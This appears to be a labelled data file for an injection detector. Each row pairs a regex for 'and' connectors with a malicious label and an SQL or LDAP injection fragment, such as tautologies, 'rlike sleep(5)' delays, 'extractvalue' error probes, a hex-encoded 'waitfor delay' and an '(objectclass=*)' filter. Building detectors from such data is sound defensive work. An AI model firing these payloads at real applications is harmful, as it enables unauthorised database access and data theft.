(\%20and|\+and|&&|\&\&)										1		 1"   )    )     )   rlike sleep  (  5  )  #
(\%20and|\+and|&&|\&\&)										1		 1  )   as itvm where 1482  =  1482
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 2367  =  2367
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as ipfy where 1189  =  1189
(\%20and|\+and|&&|\&\&)										1		 iif  (  1217  =  8831
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 iif  (  4836  =  1823
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as xbhp where 7527  =  7527
(\%20and|\+and|&&|\&\&)										1		 1  )   as ptxw where 9873  =  9873
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 9093  =  9093
(\%20and|\+and|&&|\&\&)										1		 1 where 2238  =  2238
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as swwb where 4244  =  4244
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as vgsb where 4747  =  4747
(\%20and|\+and|&&|\&\&)										1		 1  )   where 2930  =  2930
(\%20and|\+and|&&|\&\&)										1		 make_set  (  8734  =  8734
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 9062  =  9062
(\%20and|\+and|&&|\&\&)										1		 1  )   where 7050  =  7050
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as wssb where 5772  =  5772
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 4913  =  4913
(\%20and|\+and|&&|\&\&)										1		 1%" procedure analyse  (  extractvalue  (  9627
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 4588  =  4588
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    procedure analyse  (  extractvalue  (  9627
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1 where 8135  =  8135
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as turj where 1237  =  1237
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as nncz where 2331  =  2331
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as qlkf where 6635  =  6635
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 iif  (  7036  =  2370
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as fmul where 7827  =  7827
(\%20and|\+and|&&|\&\&)										1		 1%"   )    )    procedure analyse  (  extractvalue  (  9627
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 2070  =  2070
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1%"   )    )   
(\%20and|\+and|&&|\&\&)										1		 make_set  (  5679  =  9769
(\%20and|\+and|&&|\&\&)										1		 1  )   where 5629  =  5629
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 4520  =  4520
(\%20and|\+and|&&|\&\&)										1		 1 where 6518  =  6518
(\%20and|\+and|&&|\&\&)										1		 1   )    ) 
(\%20and|\+and|&&|\&\&)										1		 iif  (  1483  =  7301
(\%20and|\+and|&&|\&\&)										1		 1"  )   as kuuf where 6908  =  6908
(\%20and|\+and|&&|\&\&)										1		 1 where 8532  =  8532
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as dooq where 7911  =  7911
(\%20and|\+and|&&|\&\&)										1		 1 where 9083  =  9083 procedure analyse  (  extractvalue  (  9627
(\%20and|\+and|&&|\&\&)										1		 1  )   where 2307  =  2307
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as qzmg where 4344  =  4344 procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as xroy where 3274  =  3274
(\%20and|\+and|&&|\&\&)										1		 iif  (  5519  =  4796
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 7548  =  7548
(\%20and|\+and|&&|\&\&)										1		 1 where 7055  =  7055
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as yosd where 1255  =  1255
(\%20and|\+and|&&|\&\&)										1		 1  )   where 3671  =  3671
(\%20and|\+and|&&|\&\&)										1		 1  )   where 1120  =  1120
(\%20and|\+and|&&|\&\&)										1		 1"  )   as aifd where 5962  =  5962
(\%20and|\+and|&&|\&\&)										1		 1  )   as mpnj where 5049  =  5049
(\%20and|\+and|&&|\&\&)										1		 iif  (  9134  =  5736
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 3321  =  3321
(\%20and|\+and|&&|\&\&)										1		 1  )   where 4711  =  4711
(\%20and|\+and|&&|\&\&)										1		 iif  (  1305  =  5656
(\%20and|\+and|&&|\&\&)										1		 1" where 9919  =  9919
(\%20and|\+and|&&|\&\&)										1		 1" where 4319  =  4319
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as hxzh where 9284  =  9284
(\%20and|\+and|&&|\&\&)										1		 1"  )   as fgne where 7207  =  7207
(\%20and|\+and|&&|\&\&)										1		 1" where 5927  =  5927
(\%20and|\+and|&&|\&\&)										1		  (  case when 5640  =  5640 then 5640 else null end  ) 
(\%20and|\+and|&&|\&\&)										1		 1  )   where 2223  =  2223
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1%"   )    )    procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as wwys where 9248  =  9248
(\%20and|\+and|&&|\&\&)										1		 1  )   where 1622  =  1622
(\%20and|\+and|&&|\&\&)										1		 1 where 9932  =  9932
(\%20and|\+and|&&|\&\&)										1		 1   )    )     )   rlike sleep  (  5  )  #
(\%20and|\+and|&&|\&\&)										1		 1  )   where 9683  =  9683
(\%20and|\+and|&&|\&\&)										1		 1"   )    )     )  
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as hace where 8785  =  8785
(\%20and|\+and|&&|\&\&)										1		 1 rlike sleep  (  5  ) 
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 8153  =  8153
(\%20and|\+and|&&|\&\&)										1		 a
(\%20and|\+and|&&|\&\&)										1		 @
(\%20and|\+and|&&|\&\&)										1		  (  ||6  ) 
(\%20and|\+and|&&|\&\&)										1		 &1c
(\%20and|\+and|&&|\&\&)										1		  (  s
(\%20and|\+and|&&|\&\&)										1		  )  s
(\%20and|\+and|&&|\&\&)										1		 1s
(\%20and|\+and|&&|\&\&)										1		 s
(\%20and|\+and|&&|\&\&)										1		 ?s
(\%20and|\+and|&&|\&\&)										1		 UE1
(\%20and|\+and|&&|\&\&)										1		 UEs
(\%20and|\+and|&&|\&\&)										1		 UEv
(\%20and|\+and|&&|\&\&)										1		 c
(\%20and|\+and|&&|\&\&)										1		 n
(\%20and|\+and|&&|\&\&)										1		 ns
(\%20and|\+and|&&|\&\&)										1		 os
(\%20and|\+and|&&|\&\&)										1		 v
(\%20and|\+and|&&|\&\&)										1		 {s
(\%20and|\+and|&&|\&\&)										1		 " "
(\%20and|\+and|&&|\&\&)										1		 0
(\%20and|\+and|&&|\&\&)										1		 handler
(\%20and|\+and|&&|\&\&)										1		 to_timestamp_tz
(\%20and|\+and|&&|\&\&)										1		 tz_offset
(\%20and|\+and|&&|\&\&)										1		 %7C
(\%20and|\+and|&&|\&\&)										1		 %2A%28%7C%28objectclass%3D%2A%29%29
(\%20and|\+and|&&|\&\&)										1		 28%
(\%20and|\+and|&&|\&\&)										1		 29%
(\%20and|\+and|&&|\&\&)										1		 &
(\%20and|\+and|&&|\&\&)										1		 26%
(\%20and|\+and|&&|\&\&)										1		  
(\%20and|\+and|&&|\&\&)										1		 //
(\%20and|\+and|&&|\&\&)										1		 */*
(\%20and|\+and|&&|\&\&)										1		 21%
(\%20and|\+and|&&|\&\&)										1		 3.1E+017
(\%20and|\+and|&&|\&\&)										1		 26%
(\%20and|\+and|&&|\&\&)										1		 0x77616974666F722064656C61792027303A303A313027 ...
(\%20and|\+and|&&|\&\&)										1		 29%
(\%20and|\+and|&&|\&\&)										1		 28%
